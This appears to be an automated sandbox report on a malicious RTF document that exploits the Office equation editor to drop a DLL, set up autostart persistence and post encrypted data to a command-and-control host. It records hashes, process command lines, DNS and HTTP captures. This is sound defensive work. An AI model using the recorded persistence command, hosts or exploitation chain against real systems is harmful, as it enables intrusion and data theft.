Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B3362 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_617B3362
Contains functionality to query the account / user nameShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__swprintf_c_l,3_2_00516DF6
Queries information about the installed CPU (vendor, model number etc)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
Queries the product ID of WindowsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Uses the system / local time for branch decision (may execute only at specific dates)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005163DA GetLocalTime followed by cmp: cmp word ptr [esp+12h], 0010h and CTI: jne 005164DCh3_2_005163DA

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 487031 Sample: DoNotOpen2.doc Startdate: 24/01/2018 Architecture: WINDOWS Score: 96 31 Document exploit detected (drops PE files) 2->31 33 May check the online IP address of the machine 2->33 35 Contains functionality to detect virtual machines (IN, VMware) 2->35 37 8 other signatures 2->37 6 EQNEDT32.EXE 1 2->6         started        9 WINWORD.EXE 72 32 2->9         started        12 EQNEDT32.EXE 47 2->12         started        14 2 other processes 2->14 process3 file4 43 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->43 16 iexplore.exe 1 9 6->16         started        23 C:\Users\user~1\AppData\Local\Temp\a.b, PE32 9->23 dropped signatures5 process6 dnsIp7 25 api.ipaddress.com 16->25 27 api.ipaddress.com 209.126.119.177, 49188, 80 SERVER4YOU-server4youIncUS United States 16->27 29 103.236.150.14, 49189, 80 IDNIC-SERVERKEREN-AS-IDPTExaRekatekProsolusiID Indonesia 16->29 21 C:\Users\user\AppData\...21avShExt.dll, PE32 16->21 dropped 39 Creates an autostart registry key pointing to binary in C:\Windows 16->39 file8 41 May check the online IP address of the machine 25->41 signatures9

Simulations

Behavior and APIs

TimeTypeDescription
19:15:15API Interceptor340x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 5000ms
19:15:17API Interceptor3x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 5000ms
19:15:18API Interceptor938x Sleep call for process: explorer.exe modified from: 60000ms to: 5000ms
19:15:20API Interceptor2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 5000ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

windows-stand

Startup

  • System is w7_1
  • WINWORD.EXE (PID: 3368 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)
  • EQNEDT32.EXE (PID: 3420 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • iexplore.exe (PID: 3444 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: EE79D654A04333F566DF07EBDE217928)
  • explorer.exe (PID: 3488 cmdline: explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • EQNEDT32.EXE (PID: 3496 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • explorer.exe (PID: 3544 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\a.b
File Type:PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):72704
Entropy (8bit):7.792067824152349
Encrypted:false
MD5:CD36BBD7F949CF017EDBA0E6AAADF28C
SHA1:2FDE32F2695BC7B3B702A1E3B53A8C38E60B7402
SHA-256:6DC2A49D58DC568944FEF8285AD7A03B772B9BDF1FE4BDDFF3F1ADE3862EAE79
SHA-512:37C99E8FF71C6FF4FFBE39F0358E019379094D75C5B0C7E7837C783134704369C860B22AE2EE0346692FFF44738F592CFAAA050C4BF649D7F661964BC1F252B5
Malicious:true
Reputation:low
C:\Users\user~1\AppData\Local\Temp\a.b:Zone.Identifier
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
Entropy (8bit):3.9500637564362093
Encrypted:false
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1CD60.db
File Type:data
Size (bytes):1234
Entropy (8bit):7.673826510159546
Encrypted:false
MD5:1DDCBB5BE7004A9C3D60E6EA201EC6BF
SHA1:B76B1345B5863020D49913A5DDFC9104275D4E02
SHA-256:DBDDA9E664A2F00F69F618B41A50F0DEE1380A6A1251AAAEC4A071147BDD85E8
SHA-512:4B846E55A4ACD6486707087DD527468EE69B3CF74BD7FE9D0EB0EEB6AE9CA663D4FCEDB107E256B0C8B34A05BFBC59CF1A3564EF96E5AE6264D39C1EB3C75A40
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35883A03.emf
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes):4952
Entropy (8bit):3.5299498766178474
Encrypted:false
MD5:76A6A9E9C48C004024044BCE75D37E51
SHA1:4C00770A39340B2A048510A0950634831A05D5B1
SHA-256:4F8B5CF21952829BAC2C984A04B8C842ED1E410D66A399E4EDBA08F12518DA00
SHA-512:6C465F047EFA3CCC419DF87DCF6F3A29DEA5C16C0F922B13F637987D9914F7897735D6930CCD950127E229BDE384C1660A3670EA706473A82CCEC2E075E7AC70
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A0D9A712-568D-40D0-B7F6-6A85F1374384}.tmp
File Type:Microsoft Word Document
Size (bytes):4096
Entropy (8bit):2.0923481278854603
Encrypted:false
MD5:92086E57A2606B48530BD480E4433466
SHA1:7846DDC450B391B6C8CFB816C809E6456C7082A1
SHA-256:8D758651DD164E0528775ED8F4A639E8BE4432CF862D346043CCD012FADFB22F
SHA-512:BA7F634EDF1FB4849590103703A52CBF5474C27695D347BF1AE46809B5403B76C8E4248B0C0E9E9B4E055179392B6AA8865E7A93774D1C15B3E087CA334F4F18
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16571D6F-8073-4493-9B1A-D2C4FF082D62}.tmp
File Type:data
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22A100BA-EC67-445B-87C8-9798062FBA4F}.tmp
File Type:data
Size (bytes):17162
Entropy (8bit):3.885473232990777
Encrypted:false
MD5:DEF82BC50419BEA3579CE03222140012
SHA1:6140A77DA25681CB99C87FC6F64DB4871CA8D97C
SHA-256:D80AA9834FBB4564C928BB46C06FD6258DF3DAE1F6977C6DEAA08BFB9228C498
SHA-512:68231D80CB4A2C7DC0F0E0A28AD5F2C5FFA200E38B1ADF7FD196018424768C0460638F0E4F3D8E16B60020839D324BCB012891F58177876A4945B1CDD90C2446
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DoNotOpen2.LNK
File Type:MS Windows shortcut
Size (bytes):2066
Entropy (8bit):4.571699609436004
Encrypted:false
MD5:AB3ECA74AF0ED11F094BE0571FE5F06B
SHA1:74597A880CA352A5AF0A8B6B9C4BEED26E676F32
SHA-256:31A8A67BBC167FE4C7CC81DE2F66A4825C22DFE5C7E631C924C35542141A9DF9
SHA-512:6AF53713B731666836042EA1BB301D9C3FDC98BC3EB3DFA468F5A2605E005D2E048B331BC5E09FD62688DF2987370C35861999A2AE27FA1A63BCCBF599F4AF96
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:ASCII text, with CRLF line terminators
Size (bytes):54
Entropy (8bit):4.416653011302537
Encrypted:false
MD5:95E7739FE75359E97BD88812A26D19B6
SHA1:E6AAC3EF7260591E2AB3ABA6C47541C2BC39D9DE
SHA-256:C842AE68D3CEBFB0E8AEAEF9547AF8A8C5D235BDD39E8383695880F50352E824
SHA-512:DA9CB469DE47C83A41322130584708E24C76E81259F7E5C9DF08F061882F9C5C8105F7A59D97ED6D3176EA087A7E4553700CAB0DF1368E0868C9EA23C9E4195F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:data
Size (bytes):162
Entropy (8bit):3.020922996257724
Encrypted:false
MD5:FFCBCAB394CED9465D4D47DA6DDDAD73
SHA1:E4E8220021519959D56383BE9F0DAAB4419B106B
SHA-256:0F219C83F79A184F98D27BADD94BC48A8025B49A7E62A28B67FDBE27AB229AB5
SHA-512:0A182F9A4A8686F25CD40723186E8BD2C7FA86C87D88F10FAD74040E122E37905538FEB7951C374AA982B793C08F85D28B91F0DF6787F684F8BAB8B4189E4025
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
File Type:PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):72704
Entropy (8bit):7.792067824152349
Encrypted:false
MD5:CD36BBD7F949CF017EDBA0E6AAADF28C
SHA1:2FDE32F2695BC7B3B702A1E3B53A8C38E60B7402
SHA-256:6DC2A49D58DC568944FEF8285AD7A03B772B9BDF1FE4BDDFF3F1ADE3862EAE79
SHA-512:37C99E8FF71C6FF4FFBE39F0358E019379094D75C5B0C7E7837C783134704369C860B22AE2EE0346692FFF44738F592CFAAA050C4BF649D7F661964BC1F252B5
Malicious:false
Reputation:low
C:\Users\user\Desktop\~$NotOpen2.doc
File Type:data
Size (bytes):162
Entropy (8bit):3.020922996257724
Encrypted:false
MD5:FFCBCAB394CED9465D4D47DA6DDDAD73
SHA1:E4E8220021519959D56383BE9F0DAAB4419B106B
SHA-256:0F219C83F79A184F98D27BADD94BC48A8025B49A7E62A28B67FDBE27AB229AB5
SHA-512:0A182F9A4A8686F25CD40723186E8BD2C7FA86C87D88F10FAD74040E122E37905538FEB7951C374AA982B793C08F85D28B91F0DF6787F684F8BAB8B4189E4025
Malicious:false
Reputation:low
\samr
File Type:GLS_BINARY_LSB_FIRST
Size (bytes):116
Entropy (8bit):4.053374040827533
Encrypted:false
MD5:080E701E8B8E2E9C68203C150AC7C6B7
SHA1:4EF041621388B805758AE1D3B122F9D364705223
SHA-256:FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
api.ipaddress.com209.126.119.177truetrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
103.236.150.14Indonesia
55664IDNIC-SERVERKEREN-AS-IDPTExaRekatekProsolusiIDfalse
209.126.119.177United States
30083SERVER4YOU-server4youIncUSfalse

Static File Info

General

File type:Rich Text Format data, version 1, unknown character set
Entropy (8bit):4.652722413777991
TrID:
  • Rich Text Format (5005/1) 55.56%
  • Rich Text Format (4004/1) 44.44%
File name:DoNotOpen2.doc
File size:261090
MD5:f12fc711529b48bcef52c5ca0a52335a
SHA1:5f89a6b2f1f38b581c65e9a1117c43a3060bfdc1
SHA256:d3fc69a9f2ae2c446434abbfbe1693ef0f81a5da0a7f39d27c80d85f4a49c411
SHA512:dcec5673653561354867fa1586a60899e4fd952fd693922aaba86c765710cd32186ca7c1d94bc364e4d384681f4f5fd1de9f2836b4cd53bef39fcb2e96dc0a51
File Content Preview:{\rtf1\adeflang1025\ansi\ansicpg936\uc2\adeff0\deff0\stshfdbch13\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;

File Icon

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jan 24, 2018 19:14:59.392513037 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:00.392843008 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:01.468115091 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:03.470319986 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:07.470093012 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:08.509563923 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.509613991 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.509638071 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.509663105 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.519042969 MEZ5120853192.168.1.168.8.8.8
Jan 24, 2018 19:15:08.983194113 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:09.517062902 MEZ5120853192.168.1.168.8.8.8
Jan 24, 2018 19:15:09.659126043 MEZ53512088.8.8.8192.168.1.16
Jan 24, 2018 19:15:09.665558100 MEZ4918880192.168.1.16209.126.119.177
Jan 24, 2018 19:15:09.665606976 MEZ8049188209.126.119.177192.168.1.16
Jan 24, 2018 19:15:09.665831089 MEZ4918880192.168.1.16209.126.119.177
Jan 24, 2018 19:15:09.666721106 MEZ4918880192.168.1.16209.126.119.177
Jan 24, 2018 19:15:09.666749001 MEZ8049188209.126.119.177192.168.1.16
Jan 24, 2018 19:15:10.673778057 MEZ53512088.8.8.8192.168.1.16
Jan 24, 2018 19:15:17.092802048 MEZ8049188209.126.119.177192.168.1.16
Jan 24, 2018 19:15:17.172864914 MEZ4918980192.168.1.16103.236.150.14
Jan 24, 2018 19:15:17.172935009 MEZ8049189103.236.150.14192.168.1.16
Jan 24, 2018 19:15:17.173010111 MEZ4918980192.168.1.16103.236.150.14
Jan 24, 2018 19:15:17.173393011 MEZ4918980192.168.1.16103.236.150.14
Jan 24, 2018 19:15:17.173419952 MEZ8049189103.236.150.14192.168.1.16
Jan 24, 2018 19:15:17.173904896 MEZ4918980192.168.1.16103.236.150.14
Jan 24, 2018 19:15:17.173933983 MEZ8049189103.236.150.14192.168.1.16
Jan 24, 2018 19:15:17.295620918 MEZ8049188209.126.119.177192.168.1.16
Jan 24, 2018 19:15:17.295701981 MEZ4918880192.168.1.16209.126.119.177
Jan 24, 2018 19:15:19.410465002 MEZ8049188209.126.119.177192.168.1.16
Jan 24, 2018 19:15:19.410650015 MEZ4918880192.168.1.16209.126.119.177
Jan 24, 2018 19:15:19.413503885 MEZ4918880192.168.1.16209.126.119.177
Jan 24, 2018 19:15:19.413541079 MEZ8049188209.126.119.177192.168.1.16
Jan 24, 2018 19:15:20.774741888 MEZ8049189103.236.150.14192.168.1.16
Jan 24, 2018 19:15:20.775095940 MEZ4918980192.168.1.16103.236.150.14
Jan 24, 2018 19:15:20.775259972 MEZ8049189103.236.150.14192.168.1.16
Jan 24, 2018 19:15:20.775757074 MEZ4918980192.168.1.16103.236.150.14

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jan 24, 2018 19:14:59.392513037 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:00.392843008 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:01.468115091 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:03.470319986 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:07.470093012 MEZ5697553192.168.1.168.8.8.8
Jan 24, 2018 19:15:08.509563923 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.509613991 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.509638071 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.509663105 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:08.519042969 MEZ5120853192.168.1.168.8.8.8
Jan 24, 2018 19:15:08.983194113 MEZ53569758.8.8.8192.168.1.16
Jan 24, 2018 19:15:09.517062902 MEZ5120853192.168.1.168.8.8.8
Jan 24, 2018 19:15:09.659126043 MEZ53512088.8.8.8192.168.1.16
Jan 24, 2018 19:15:10.673778057 MEZ53512088.8.8.8192.168.1.16

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Jan 24, 2018 19:14:59.392513037 MEZ192.168.1.168.8.8.80xe608Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)
Jan 24, 2018 19:15:00.392843008 MEZ192.168.1.168.8.8.80xe608Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)
Jan 24, 2018 19:15:01.468115091 MEZ192.168.1.168.8.8.80xe608Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)
Jan 24, 2018 19:15:03.470319986 MEZ192.168.1.168.8.8.80xe608Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)
Jan 24, 2018 19:15:07.470093012 MEZ192.168.1.168.8.8.80xe608Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)
Jan 24, 2018 19:15:08.519042969 MEZ192.168.1.168.8.8.80x5ec4Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)
Jan 24, 2018 19:15:09.517062902 MEZ192.168.1.168.8.8.80x5ec4Standard query (0)api.ipaddress.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jan 24, 2018 19:15:08.509563923 MEZ8.8.8.8192.168.1.160xe608No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)
Jan 24, 2018 19:15:08.509613991 MEZ8.8.8.8192.168.1.160xe608No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)
Jan 24, 2018 19:15:08.509638071 MEZ8.8.8.8192.168.1.160xe608No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)
Jan 24, 2018 19:15:08.509663105 MEZ8.8.8.8192.168.1.160xe608No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)
Jan 24, 2018 19:15:08.983194113 MEZ8.8.8.8192.168.1.160xe608No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)
Jan 24, 2018 19:15:09.659126043 MEZ8.8.8.8192.168.1.160x5ec4No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)
Jan 24, 2018 19:15:10.673778057 MEZ8.8.8.8192.168.1.160x5ec4No error (0)api.ipaddress.com209.126.119.177A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • api.ipaddress.com
  • 3.sj2xp1.paj.org

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.1.1649188209.126.119.17780C:\Program Files\Internet Explorer\iexplore.exe
TimestampkBytes transferredDirectionData
Jan 24, 2018 19:15:09.666721106 MEZ1OUTGET /myip?format=txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: api.ipaddress.com
Jan 24, 2018 19:15:17.092802048 MEZ2INHTTP/1.1 200 OK
Date: Wed, 24 Jan 2018 18:15:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 31 Jan 2018 18:15:14 GMT
Content-Length: 13
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
Data Raw: 31 38 35 2e 32 32 30 2e 31 30 31 2e 34
Data Ascii: 185.220.101.4
Jan 24, 2018 19:15:17.295620918 MEZ6INHTTP/1.1 200 OK
Date: Wed, 24 Jan 2018 18:15:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 31 Jan 2018 18:15:14 GMT
Content-Length: 13
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
Data Raw: 31 38 35 2e 32 32 30 2e 31 30 31 2e 34
Data Ascii: 185.220.101.4


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.1.1649189103.236.150.1480C:\Program Files\Internet Explorer\iexplore.exe
TimestampkBytes transferredDirectionData
Jan 24, 2018 19:15:17.173393011 MEZ3OUTPOST /goix/nhbqad.asp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: application/jason,application/xml, q=0.9,*/*, q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: 339hndxz=0wEEgqeI/L2qQmlVILDcCEjSuUvCsdzViNvvozbedxbAdA==; o49jg=zWVEEy8HHngAYbc+1rE0gJkrvAStoctjYgNpv4k6Szt9NkBBW93Ico9ieReFMojFzEeoAHCYHUFDrRQsvDbgYVM2KqbYbWq/OaEJQ5mDN6c=; 5f51il=InuyYTmulipC/qjau0zml1Nu7+ym09aui/5ksuwxMGq7sY44kB6xGZGq/lwuTsKXbhsr7wKboki43IbVzk8H3Si3N/B0rCRkIuwEFKiK8ys=;
Host: 3.sj2xp1.paj.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 3394
Jan 24, 2018 19:15:17.173904896 MEZ6OUTData Raw: 40 0d 07 a2 c2 88 2c fe 8c 3a c1 4b 29 ca 60 b6 63 fd 5f 5d fc 03 1c 24 8a da 58 00 34 c0 04 1a 3d ef 18 42 3c d7 2f 17 5b 82 5d 82 df 4e 4d 57 07 35 ef ae 99 4e 42 50 81 23 cb a3 82 1a 0c 99 6a 90 1d fe 1b 59 61 1c 29 9b 36 ea d7 92 74 21 0f 1f
Data Ascii: @,:K)`c_]$X4=B</[]NMW5NBP#jYa)6t!LIvm7}vD11W(;&~K"2fMh(W*inGYs+ITFw7]zNFVlM`2>nd@%.@%rlav
Jan 24, 2018 19:15:20.774741888 MEZ7INHTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jan 2018 18:15:18 GMT
Content-Length: 0
Connection: close
Cache-Control: no-cache


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3368 Parent PID: 2964

General

Start time:19:15:14
Start date:24/01/2018
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc
Imagebase:0x77390000
File size:1423008 bytes
